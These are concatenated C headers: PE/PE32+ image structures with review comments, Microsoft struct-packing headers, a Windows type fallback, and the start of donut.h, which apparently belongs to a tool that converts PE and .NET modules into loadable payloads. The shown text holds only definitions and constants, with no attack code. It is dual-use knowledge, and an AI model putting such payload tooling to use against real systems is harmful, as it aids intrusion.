// from the PE32+ layout below in carrying BaseOfData and 32-bit ImageBase and
// stack/heap sizes.  DataDirectory is a fixed 16-entry array, but
// NumberOfRvaAndSizes is the count the image actually provides; only entries
// below min(NumberOfRvaAndSizes, IMAGE_NUMBEROF_DIRECTORY_ENTRIES) are valid.
typedef struct _IMAGE_OPTIONAL_HEADER {
    //
    // Standard fields.
    //

    WORD Magic;
    BYTE MajorLinkerVersion;
    BYTE MinorLinkerVersion;
    DWORD SizeOfCode;
    DWORD SizeOfInitializedData;
    DWORD SizeOfUninitializedData;
    DWORD AddressOfEntryPoint;
    DWORD BaseOfCode;
    DWORD BaseOfData;

    //
    // NT additional fields.
    //

    DWORD ImageBase;
    DWORD SectionAlignment;
    DWORD FileAlignment;
    WORD MajorOperatingSystemVersion;
    WORD MinorOperatingSystemVersion;
    WORD MajorImageVersion;
    WORD MinorImageVersion;
    WORD MajorSubsystemVersion;
    WORD MinorSubsystemVersion;
    DWORD Win32VersionValue;
    DWORD SizeOfImage;
    DWORD SizeOfHeaders;
    DWORD CheckSum;
    WORD Subsystem;
    WORD DllCharacteristics;
    DWORD SizeOfStackReserve;
    DWORD SizeOfStackCommit;
    DWORD SizeOfHeapReserve;
    DWORD SizeOfHeapCommit;
    DWORD LoaderFlags;
    DWORD NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
178 | ||
// PE32+ optional header (Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC): no BaseOfData,
// and ImageBase plus the stack/heap sizes are 64-bit.  ULONGLONG comes from
// wintypes.h, whose non-MSVC fallback defines it as a signed 64-bit type, so
// comparisons on these fields are signed there.  As with the PE32 header, only
// DataDirectory entries below min(NumberOfRvaAndSizes, 16) are valid.
typedef struct _IMAGE_OPTIONAL_HEADER64 {
    WORD Magic;
    BYTE MajorLinkerVersion;
    BYTE MinorLinkerVersion;
    DWORD SizeOfCode;
    DWORD SizeOfInitializedData;
    DWORD SizeOfUninitializedData;
    DWORD AddressOfEntryPoint;
    DWORD BaseOfCode;
    ULONGLONG ImageBase;
    DWORD SectionAlignment;
    DWORD FileAlignment;
    WORD MajorOperatingSystemVersion;
    WORD MinorOperatingSystemVersion;
    WORD MajorImageVersion;
    WORD MinorImageVersion;
    WORD MajorSubsystemVersion;
    WORD MinorSubsystemVersion;
    DWORD Win32VersionValue;
    DWORD SizeOfImage;
    DWORD SizeOfHeaders;
    DWORD CheckSum;
    WORD Subsystem;
    WORD DllCharacteristics;
    ULONGLONG SizeOfStackReserve;
    ULONGLONG SizeOfStackCommit;
    ULONGLONG SizeOfHeapReserve;
    ULONGLONG SizeOfHeapCommit;
    DWORD LoaderFlags;
    DWORD NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
211 | ||
212 | #define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b | |
213 | #define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b | |
214 | #define IMAGE_ROM_OPTIONAL_HDR_MAGIC 0x107 | |
215 | ||
// Generic optional-header alias, selected by the *compiling host's* pointer
// width (_WIN64), not by the image being parsed.  NOTE(review): the
// IMAGE_NT_HEADERS alias further down keys on _WIN32 instead, so the two
// generic names do not agree on most targets; code that parses both PE32 and
// PE32+ files should use the explicit 32/64 types.
#ifdef _WIN64
typedef IMAGE_OPTIONAL_HEADER64 IMAGE_OPTIONAL_HEADER;
typedef PIMAGE_OPTIONAL_HEADER64 PIMAGE_OPTIONAL_HEADER;
#define IMAGE_NT_OPTIONAL_HDR_MAGIC IMAGE_NT_OPTIONAL_HDR64_MAGIC
#else
typedef IMAGE_OPTIONAL_HEADER32 IMAGE_OPTIONAL_HEADER;
typedef PIMAGE_OPTIONAL_HEADER32 PIMAGE_OPTIONAL_HEADER;
#define IMAGE_NT_OPTIONAL_HDR_MAGIC IMAGE_NT_OPTIONAL_HDR32_MAGIC
#endif
225 | ||
// PE32+ NT headers at DOS header e_lfanew.  Signature must equal
// IMAGE_NT_SIGNATURE.  FileHeader.SizeOfOptionalHeader is the number of
// optional-header bytes actually present in the file and may be smaller than
// sizeof(OptionalHeader); check it before reading OptionalHeader fields.
typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;
231 | ||
// PE32 NT headers; same layout as the 64-bit variant up to and including
// FileHeader, so OptionalHeader.Magic can be read through either type to tell
// the two apart.  The struct tag is _IMAGE_NT_HEADERS but the typedef name
// is IMAGE_NT_HEADERS32.
typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;
237 | ||
// NOTE(review): this selector keys on _WIN32, which Microsoft toolchains define
// on 64-bit Windows as well, while IMAGE_OPTIONAL_HEADER above keys on _WIN64.
// The two generic aliases therefore disagree on every target except 32-bit
// Windows: on a 64-bit Windows build this picks the 32-bit NT headers, and on
// a non-Windows host it picks the 64-bit NT headers next to a 32-bit
// IMAGE_OPTIONAL_HEADER.  Only offsetof(IMAGE_NT_HEADERS, OptionalHeader) is
// the same either way; prefer the explicit 32/64 types elsewhere.
#if defined(_WIN32)
typedef IMAGE_NT_HEADERS32 IMAGE_NT_HEADERS;
typedef PIMAGE_NT_HEADERS32 PIMAGE_NT_HEADERS;
#else
typedef IMAGE_NT_HEADERS64 IMAGE_NT_HEADERS;
typedef PIMAGE_NT_HEADERS64 PIMAGE_NT_HEADERS;
#endif
245 | ||
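// IMAGE_FIRST_SECTION doesn't need 32/64 versions since the file header is the same either way.
// The section table starts right after the optional header, whose length is
// FileHeader.SizeOfOptionalHeader.  The arithmetic is done on a BYTE pointer so it
// adds bytes regardless of how ULONG_PTR is defined (wintypes.h's non-MSVC fallback
// made ULONG_PTR a pointer type, which scaled these additions by the pointee size).
// The caller must already have checked that SizeOfOptionalHeader and the section
// table lie within the buffer holding the headers.

#define IMAGE_FIRST_SECTION( ntheader ) ((PIMAGE_SECTION_HEADER) \
    ((BYTE *)(ntheader) + \
     offsetof( IMAGE_NT_HEADERS, OptionalHeader ) + \
     ((ntheader))->FileHeader.SizeOfOptionalHeader \
    ))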
253 | ||
254 | // Subsystem Values | |
255 | ||
256 | #define IMAGE_SUBSYSTEM_UNKNOWN 0 // Unknown subsystem. | |
257 | #define IMAGE_SUBSYSTEM_NATIVE 1 // Image doesn't require a subsystem. | |
258 | #define IMAGE_SUBSYSTEM_WINDOWS_GUI 2 // Image runs in the Windows GUI subsystem. | |
259 | #define IMAGE_SUBSYSTEM_WINDOWS_CUI 3 // Image runs in the Windows character subsystem. | |
260 | #define IMAGE_SUBSYSTEM_OS2_CUI 5 // image runs in the OS/2 character subsystem. | |
261 | #define IMAGE_SUBSYSTEM_POSIX_CUI 7 // image runs in the Posix character subsystem. | |
262 | #define IMAGE_SUBSYSTEM_NATIVE_WINDOWS 8 // image is a native Win9x driver. | |
263 | #define IMAGE_SUBSYSTEM_WINDOWS_CE_GUI 9 // Image runs in the Windows CE subsystem. | |
264 | #define IMAGE_SUBSYSTEM_EFI_APPLICATION 10 // | |
265 | #define IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER 11 // | |
266 | #define IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER 12 // | |
267 | #define IMAGE_SUBSYSTEM_EFI_ROM 13 | |
268 | #define IMAGE_SUBSYSTEM_XBOX 14 | |
269 | #define IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16 | |
270 | ||
271 | // DllCharacteristics Entries | |
272 | ||
273 | // IMAGE_LIBRARY_PROCESS_INIT 0x0001 // Reserved. | |
274 | // IMAGE_LIBRARY_PROCESS_TERM 0x0002 // Reserved. | |
275 | // IMAGE_LIBRARY_THREAD_INIT 0x0004 // Reserved. | |
276 | // IMAGE_LIBRARY_THREAD_TERM 0x0008 // Reserved. | |
277 | #define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040 // DLL can move. | |
278 | #define IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY 0x0080 // Code Integrity Image | |
279 | #define IMAGE_DLLCHARACTERISTICS_NX_COMPAT 0x0100 // Image is NX compatible | |
280 | #define IMAGE_DLLCHARACTERISTICS_NO_ISOLATION 0x0200 // Image understands isolation and doesn't want it | |
281 | #define IMAGE_DLLCHARACTERISTICS_NO_SEH 0x0400 // Image does not use SEH. No SE handler may reside in this image | |
282 | #define IMAGE_DLLCHARACTERISTICS_NO_BIND 0x0800 // Do not bind this image. | |
283 | // 0x1000 // Reserved. | |
284 | #define IMAGE_DLLCHARACTERISTICS_WDM_DRIVER 0x2000 // Driver uses WDM model | |
285 | // 0x4000 // Reserved. | |
286 | #define IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE 0x8000 | |
287 | ||
288 | // Directory Entries | |
289 | ||
290 | #define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Export Directory | |
291 | #define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory | |
292 | #define IMAGE_DIRECTORY_ENTRY_RESOURCE 2 // Resource Directory | |
293 | #define IMAGE_DIRECTORY_ENTRY_EXCEPTION 3 // Exception Directory | |
294 | #define IMAGE_DIRECTORY_ENTRY_SECURITY 4 // Security Directory | |
295 | #define IMAGE_DIRECTORY_ENTRY_BASERELOC 5 // Base Relocation Table | |
296 | #define IMAGE_DIRECTORY_ENTRY_DEBUG 6 // Debug Directory | |
297 | // IMAGE_DIRECTORY_ENTRY_COPYRIGHT 7 // (X86 usage) | |
298 | #define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE 7 // Architecture Specific Data | |
299 | #define IMAGE_DIRECTORY_ENTRY_GLOBALPTR 8 // RVA of GP | |
300 | #define IMAGE_DIRECTORY_ENTRY_TLS 9 // TLS Directory | |
301 | #define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 10 // Load Configuration Directory | |
302 | #define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 11 // Bound Import Directory in headers | |
303 | #define IMAGE_DIRECTORY_ENTRY_IAT 12 // Import Address Table | |
304 | #define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 13 // Delay Load Import Descriptors | |
305 | #define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14 // COM Runtime descriptor | |
306 | ||
307 | // | |
308 | // Section header format. | |
309 | // | |
310 | ||
311 | #define IMAGE_SIZEOF_SHORT_NAME 8 | |
312 | ||
// One entry of the section table (fixed 40 bytes, IMAGE_SIZEOF_SECTION_HEADER),
// FileHeader.NumberOfSections entries starting at IMAGE_FIRST_SECTION().
// Name is a fixed 8-byte field that carries no terminator when all eight bytes
// are used, so it must not be handled as a C string.  Misc.VirtualSize is the
// in-memory extent and SizeOfRawData the on-disk extent; they may differ, and
// PointerToRawData + SizeOfRawData must be checked against the file size before
// the raw data is read.  Characteristics is a mask of IMAGE_SCN_*.
typedef struct _IMAGE_SECTION_HEADER {
    BYTE Name[IMAGE_SIZEOF_SHORT_NAME];
    union {
        DWORD PhysicalAddress;
        DWORD VirtualSize;
    } Misc;
    DWORD VirtualAddress;
    DWORD SizeOfRawData;
    DWORD PointerToRawData;
    DWORD PointerToRelocations;
    DWORD PointerToLinenumbers;
    WORD NumberOfRelocations;
    WORD NumberOfLinenumbers;
    DWORD Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
328 | ||
329 | #define IMAGE_SIZEOF_SECTION_HEADER 40 | |
330 | ||
331 | // | |
332 | // Section characteristics. | |
333 | // | |
334 | // IMAGE_SCN_TYPE_REG 0x00000000 // Reserved. | |
335 | // IMAGE_SCN_TYPE_DSECT 0x00000001 // Reserved. | |
336 | // IMAGE_SCN_TYPE_NOLOAD 0x00000002 // Reserved. | |
337 | // IMAGE_SCN_TYPE_GROUP 0x00000004 // Reserved. | |
338 | #define IMAGE_SCN_TYPE_NO_PAD 0x00000008 // Reserved. | |
339 | // IMAGE_SCN_TYPE_COPY 0x00000010 // Reserved. | |
340 | ||
341 | #define IMAGE_SCN_CNT_CODE 0x00000020 // Section contains code. | |
342 | #define IMAGE_SCN_CNT_INITIALIZED_DATA 0x00000040 // Section contains initialized data. | |
343 | #define IMAGE_SCN_CNT_UNINITIALIZED_DATA 0x00000080 // Section contains uninitialized data. | |
344 | ||
345 | #define IMAGE_SCN_LNK_OTHER 0x00000100 // Reserved. | |
346 | #define IMAGE_SCN_LNK_INFO 0x00000200 // Section contains comments or some other type of information. | |
347 | // IMAGE_SCN_TYPE_OVER 0x00000400 // Reserved. | |
348 | #define IMAGE_SCN_LNK_REMOVE 0x00000800 // Section contents will not become part of image. | |
349 | #define IMAGE_SCN_LNK_COMDAT 0x00001000 // Section contents comdat. | |
350 | // 0x00002000 // Reserved. | |
351 | // IMAGE_SCN_MEM_PROTECTED - Obsolete 0x00004000 | |
352 | #define IMAGE_SCN_NO_DEFER_SPEC_EXC 0x00004000 // Reset speculative exceptions handling bits in the TLB entries for this section. | |
353 | #define IMAGE_SCN_GPREL 0x00008000 // Section content can be accessed relative to GP | |
354 | #define IMAGE_SCN_MEM_FARDATA 0x00008000 | |
355 | // IMAGE_SCN_MEM_SYSHEAP - Obsolete 0x00010000 | |
356 | #define IMAGE_SCN_MEM_PURGEABLE 0x00020000 | |
357 | #define IMAGE_SCN_MEM_16BIT 0x00020000 | |
358 | #define IMAGE_SCN_MEM_LOCKED 0x00040000 | |
359 | #define IMAGE_SCN_MEM_PRELOAD 0x00080000 | |
360 | ||
361 | #define IMAGE_SCN_ALIGN_1BYTES 0x00100000 // | |
362 | #define IMAGE_SCN_ALIGN_2BYTES 0x00200000 // | |
363 | #define IMAGE_SCN_ALIGN_4BYTES 0x00300000 // | |
364 | #define IMAGE_SCN_ALIGN_8BYTES 0x00400000 // | |
365 | #define IMAGE_SCN_ALIGN_16BYTES 0x00500000 // Default alignment if no others are specified. | |
366 | #define IMAGE_SCN_ALIGN_32BYTES 0x00600000 // | |
367 | #define IMAGE_SCN_ALIGN_64BYTES 0x00700000 // | |
368 | #define IMAGE_SCN_ALIGN_128BYTES 0x00800000 // | |
369 | #define IMAGE_SCN_ALIGN_256BYTES 0x00900000 // | |
370 | #define IMAGE_SCN_ALIGN_512BYTES 0x00A00000 // | |
371 | #define IMAGE_SCN_ALIGN_1024BYTES 0x00B00000 // | |
372 | #define IMAGE_SCN_ALIGN_2048BYTES 0x00C00000 // | |
373 | #define IMAGE_SCN_ALIGN_4096BYTES 0x00D00000 // | |
374 | #define IMAGE_SCN_ALIGN_8192BYTES 0x00E00000 // | |
375 | // Unused 0x00F00000 | |
376 | #define IMAGE_SCN_ALIGN_MASK 0x00F00000 | |
377 | ||
378 | #define IMAGE_SCN_LNK_NRELOC_OVFL 0x01000000 // Section contains extended relocations. | |
379 | #define IMAGE_SCN_MEM_DISCARDABLE 0x02000000 // Section can be discarded. | |
380 | #define IMAGE_SCN_MEM_NOT_CACHED 0x04000000 // Section is not cachable. | |
381 | #define IMAGE_SCN_MEM_NOT_PAGED 0x08000000 // Section is not pageable. | |
382 | #define IMAGE_SCN_MEM_SHARED 0x10000000 // Section is shareable. | |
383 | #define IMAGE_SCN_MEM_EXECUTE 0x20000000 // Section is executable. | |
384 | #define IMAGE_SCN_MEM_READ 0x40000000 // Section is readable. | |
385 | #define IMAGE_SCN_MEM_WRITE 0x80000000 // Section is writeable. | |
386 | ||
// CLR (.NET) runtime header, located through the
// IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR data directory.  cb is the size of this
// header in bytes and should be validated against the directory's Size; every
// IMAGE_DATA_DIRECTORY member holds an RVA/size pair that needs its own range check.
typedef struct IMAGE_COR20_HEADER
{
    // Header versioning
    DWORD cb;
    WORD MajorRuntimeVersion;
    WORD MinorRuntimeVersion;

    // Symbol table and startup information
    IMAGE_DATA_DIRECTORY MetaData;
    DWORD Flags;

    // The main program if it is an EXE (not used if a DLL?)
    // If COMIMAGE_FLAGS_NATIVE_ENTRYPOINT is not set, EntryPointToken represents a managed entrypoint.
    // If COMIMAGE_FLAGS_NATIVE_ENTRYPOINT is set, EntryPointRVA represents an RVA to a native entrypoint
    // (deprecated for DLLs, use module constructors instead).
    union {
        DWORD EntryPointToken;
        DWORD EntryPointRVA;
    };

    // This is the blob of managed resources. Fetched using code:AssemblyNative.GetResource and
    // code:PEFile.GetResource and accessible from managed code from
    // System.Assembly.GetManifestResourceStream. The meta data has a table that maps names to offsets into
    // this blob, so logically the blob is a set of resources.
    IMAGE_DATA_DIRECTORY Resources;
    // IL assemblies can be signed with a public-private key to validate who created it. The signature goes
    // here if this feature is used.
    IMAGE_DATA_DIRECTORY StrongNameSignature;

    IMAGE_DATA_DIRECTORY CodeManagerTable; // Deprecated, not used
    // Used for managed code that has unmanaged code inside it (or exports methods as unmanaged entry points)
    IMAGE_DATA_DIRECTORY VTableFixups;
    IMAGE_DATA_DIRECTORY ExportAddressTableJumps;

    // null for ordinary IL images. NGEN images it points at a code:CORCOMPILE_HEADER structure
    IMAGE_DATA_DIRECTORY ManagedNativeHeader;

} IMAGE_COR20_HEADER, *PIMAGE_COR20_HEADER;
425 | ||
// Export table, located through IMAGE_DIRECTORY_ENTRY_EXPORT.  The three
// Address* fields are RVAs of parallel arrays: NumberOfFunctions entries in the
// function table, NumberOfNames entries in the name and ordinal tables.  An
// ordinal-table entry is a WORD index into the function table (exported ordinal
// == index + Base) and must be checked against NumberOfFunctions before use;
// Name and every name-table entry are RVAs of NUL-terminated strings whose
// length is not stored, so reads of them need an explicit buffer bound.
typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD Characteristics;
    DWORD TimeDateStamp;
    WORD MajorVersion;
    WORD MinorVersion;
    DWORD Name;
    DWORD Base;
    DWORD NumberOfFunctions;
    DWORD NumberOfNames;
    DWORD AddressOfFunctions; // RVA from base of image
    DWORD AddressOfNames; // RVA from base of image
    DWORD AddressOfNameOrdinals; // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
439 | ||
440 | #endif |
/*++

Copyright (c) Microsoft Corporation. All rights reserved.

Module Name:

poppack.h

Abstract:

This file turns packing of structures off. (That is, it enables
automatic alignment of structure fields.) An include file is needed
because various compilers do this in different ways.

poppack.h is the complement to pshpack?.h. An inclusion of poppack.h
MUST ALWAYS be preceded by an inclusion of one of pshpack?.h, in one-to-one
correspondence.

For Microsoft compatible compilers, this file uses the pop option
to the pack pragma so that it can restore the previous saved by the
pshpack?.h include file.

--*/

/* On compilers that do not satisfy the _MSC_VER / _PUSHPOP_SUPPORTED test
 * below (e.g. GCC or Clang without that macro), the plain `#pragma pack()`
 * branch is taken.  That resets packing to the compiler default rather than
 * restoring the value in effect before the matching pshpack?.h include, so
 * nested packing regions are not unwound correctly on those toolchains. */

#if ! (defined(lint) || defined(RC_INVOKED))
#if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
#pragma warning(disable:4103)
#if !(defined( MIDL_PASS )) || defined( __midl )
#pragma pack(pop)
#else
#pragma pack()
#endif
#else
#pragma pack()
#endif
#endif /* ! (defined(lint) || defined(RC_INVOKED)) */
36 |
/*++

Copyright (c) Microsoft Corporation. All rights reserved.

Module Name:

pshpack1.h

Abstract:

This file turns 1 byte packing of structures on. (That is, it disables
automatic alignment of structure fields.) An include file is needed
because various compilers do this in different ways. For Microsoft
compatible compilers, this files uses the push option to the pack pragma
so that the poppack.h include file can restore the previous packing
reliably.

The file poppack.h is the complement to this file.

--*/

/* On compilers that do not satisfy the _MSC_VER / _PUSHPOP_SUPPORTED test
 * below, the plain `#pragma pack(1)` branch is taken: the previous packing is
 * not pushed, so the matching poppack.h can only reset to the default rather
 * than restore it. */

#if ! (defined(lint) || defined(RC_INVOKED))
#if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
#pragma warning(disable:4103)
#if !(defined( MIDL_PASS )) || defined( __midl )
#pragma pack(push,1)
#else
#pragma pack(1)
#endif
#else
#pragma pack(1)
#endif
#endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33 |
/*++

Copyright (c) Microsoft Corporation. All rights reserved.

Module Name:

pshpack2.h

Abstract:

This file turns 2 byte packing of structures on. (That is, it disables
automatic alignment of structure fields.) An include file is needed
because various compilers do this in different ways. For Microsoft
compatible compilers, this files uses the push option to the pack pragma
so that the poppack.h include file can restore the previous packing
reliably.

The file poppack.h is the complement to this file.

--*/

/* On compilers that do not satisfy the _MSC_VER / _PUSHPOP_SUPPORTED test
 * below, the plain `#pragma pack(2)` branch is taken: the previous packing is
 * not pushed, so the matching poppack.h can only reset to the default rather
 * than restore it. */

#if ! (defined(lint) || defined(RC_INVOKED))
#if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
#pragma warning(disable:4103)
#if !(defined( MIDL_PASS )) || defined( __midl )
#pragma pack(push,2)
#else
#pragma pack(2)
#endif
#else
#pragma pack(2)
#endif
#endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33 |
/*++

Copyright (c) Microsoft Corporation. All rights reserved.

Module Name:

pshpack4.h

Abstract:

This file turns 4 byte packing of structures on. (That is, it disables
automatic alignment of structure fields.) An include file is needed
because various compilers do this in different ways. For Microsoft
compatible compilers, this files uses the push option to the pack pragma
so that the poppack.h include file can restore the previous packing
reliably.

The file poppack.h is the complement to this file.

--*/

/* On compilers that do not satisfy the _MSC_VER / _PUSHPOP_SUPPORTED test
 * below, the plain `#pragma pack(4)` branch is taken: the previous packing is
 * not pushed, so the matching poppack.h can only reset to the default rather
 * than restore it. */

#if ! (defined(lint) || defined(RC_INVOKED))
#if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
#pragma warning(disable:4103)
#if !(defined( MIDL_PASS )) || defined( __midl )
#pragma pack(push,4)
#else
#pragma pack(4)
#endif
#else
#pragma pack(4)
#endif
#endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33 |
/*++

Copyright (c) Microsoft Corporation. All rights reserved.

Module Name:

pshpack8.h

Abstract:

This file turns 8 byte packing of structures on. (That is, it disables
automatic alignment of structure fields.) An include file is needed
because various compilers do this in different ways. For Microsoft
compatible compilers, this files uses the push option to the pack pragma
so that the poppack.h include file can restore the previous packing
reliably.

The file poppack.h is the complement to this file.

--*/

/* On compilers that do not satisfy the _MSC_VER / _PUSHPOP_SUPPORTED test
 * below, the plain `#pragma pack(8)` branch is taken: the previous packing is
 * not pushed, so the matching poppack.h can only reset to the default rather
 * than restore it. */

#if ! (defined(lint) || defined(RC_INVOKED))
#if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
#pragma warning(disable:4103)
#if !(defined( MIDL_PASS )) || defined( __midl )
#pragma pack(push,8)
#else
#pragma pack(8)
#endif
#else
#pragma pack(8)
#endif
#endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33 |
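#pragma once
/* Minimal stand-ins for the Windows SDK integer types used by pe.h when the
 * code is built with a non-Microsoft toolchain.  Under MSVC the real
 * <windows.h> is pulled in instead and everything below is skipped. */
#if _MSC_VER
#define USE_WINNT
#include <windows.h>
#endif
#ifndef USE_WINNT

/* The guard previously tested __WIN_TYPES but defined __WIN_TYPES__, so it
 * never took effect; both now use the same name. */
#ifndef __WIN_TYPES__
#define __WIN_TYPES__

/*
#if _MSC_VER
#ifndef snprintf
#define snprintf _snprintf
#endif
#ifndef snscanf
#define snscanf _snscanf
#endif
#endif
*/

#ifdef _MSC_VER
#include <stdint.h>
#else
#include <inttypes.h>
#endif

#ifndef FALSE
#define FALSE 0
#endif

#ifndef TRUE
#define TRUE 1
#endif

#ifndef BYTE
typedef unsigned char BYTE;
#endif

#ifndef BOOLEAN
typedef BYTE BOOLEAN;
#endif

/* NOTE(review): the SDK defines BOOL as a 4-byte int; the 1-byte definition
 * here only matters if BOOL ever appears in a structure layout or ABI boundary. */
#ifndef BOOL
typedef BYTE BOOL;
#endif

#ifndef WORD
typedef uint16_t WORD;
#endif

#ifndef USHORT
typedef uint16_t USHORT;
#endif

#ifndef DWORD
typedef uint32_t DWORD;
#endif

#ifndef ULONG
typedef uint32_t ULONG;
#endif

/* NOTE(review): signed here although the SDK type is unsigned.  The layout of
 * IMAGE_OPTIONAL_HEADER64 is unaffected, but comparisons on ImageBase and the
 * stack/heap sizes are signed comparisons.  Left unchanged so existing
 * callers' arithmetic does not silently change meaning. */
#ifndef ULONGLONG
typedef int64_t ULONGLONG;
#endif

#ifndef ULONGULONG
typedef uint64_t ULONGULONG;
#endif

#ifndef CHAR
typedef char CHAR;
#endif

// wchar_t is 32-bits on Linux, so UTF-16 data uses a fixed 16-bit type
#ifndef WCHAR
typedef uint16_t WCHAR;
#endif

/* Pointer-sized unsigned integer, as in the SDK.  The previous definition
 * (ULONGULONG *) was a pointer type, so pe.h's IMAGE_FIRST_SECTION()
 * additions were scaled by sizeof(ULONGULONG) instead of counting bytes. */
#ifndef ULONG_PTR
typedef uintptr_t ULONG_PTR;
#endif

#ifndef VOID
#define VOID void
/* NOTE(review): SHORT and LONG are unsigned here although the SDK types are
 * signed.  e_lfanew (LONG) in IMAGE_DOS_HEADER can therefore never read as
 * negative, so an upper-bound check is sufficient, but the behaviour differs
 * from a Windows build.  The duplicate `typedef char CHAR;` that used to sit
 * here was dropped; CHAR is defined once above. */
typedef uint16_t SHORT;
typedef uint32_t LONG;

#if !defined(MIDL_PASS)
typedef int INT;
#endif
#endif //VOID

#endif // __WIN_TYPES__
#endif // #ifndef USE_WINNT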
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef DONUT_H | |
32 | #define DONUT_H | |
33 | ||
34 | #include <stdint.h> | |
35 | #include <stdio.h> | |
36 | #include <stdlib.h> | |
37 | #include <string.h> | |
38 | #include <sys/stat.h> | |
39 | #include <inttypes.h> | |
40 | ||
41 | #define DONUT_ERROR_SUCCESS 0 | |
42 | #define DONUT_ERROR_FILE_NOT_FOUND 1 | |
43 | #define DONUT_ERROR_FILE_EMPTY 2 | |
44 | #define DONUT_ERROR_FILE_ACCESS 3 | |
45 | #define DONUT_ERROR_FILE_INVALID 4 | |
46 | #define DONUT_ERROR_NET_PARAMS 5 | |
47 | #define DONUT_ERROR_NO_MEMORY 6 | |
48 | #define DONUT_ERROR_INVALID_ARCH 7 | |
49 | #define DONUT_ERROR_INVALID_URL 8 | |
50 | #define DONUT_ERROR_URL_LENGTH 9 | |
51 | #define DONUT_ERROR_INVALID_PARAMETER 10 | |
52 | #define DONUT_ERROR_RANDOM 11 | |
53 | #define DONUT_ERROR_DLL_FUNCTION 12 | |
54 | #define DONUT_ERROR_ARCH_MISMATCH 13 | |
55 | #define DONUT_ERROR_DLL_PARAM 14 | |
56 | #define DONUT_ERROR_BYPASS_INVALID 15 | |
57 | ||
58 | // target architecture | |
59 | #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files | |
60 | #define DONUT_ARCH_X86 1 // x86 | |
61 | #define DONUT_ARCH_X64 2 // AMD64 | |
62 | #define DONUT_ARCH_X84 3 // AMD64 + x86 | |
63 | ||
64 | // module type | |
65 | #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method | |
66 | #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided | |
67 | #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional | |
